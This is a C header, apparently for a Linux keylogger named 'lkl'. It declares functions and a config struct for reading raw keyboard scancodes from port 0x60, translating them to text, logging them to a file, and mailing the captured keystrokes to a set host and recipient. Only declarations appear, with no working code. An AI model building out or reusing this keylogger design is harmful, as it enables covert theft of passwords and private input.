#include <stdio.h>
#include <sys/io.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define TABLE_SIZE 128
#define MSEC 1
#define ANTIPAIR 127
#define KEYBOARD_PORT 0x60

struct lkl{
  char *outfile, *km_file;
  char *host, *rcpt;               //snd_mail email args 
  int port, log, debug, mail;      //lkl features options
  int pressed_shift, pressed_alt;  //to choose correct keymap
};

void do_output(char c, struct lkl *lkl);
void start_log(struct lkl *lkl);
void def_keymap(char km_file[]);
void snd_mail(char ascii[], char host[], char rcpt[]);
void usage();
char *code2ascii(char c, struct lkl *lkl);
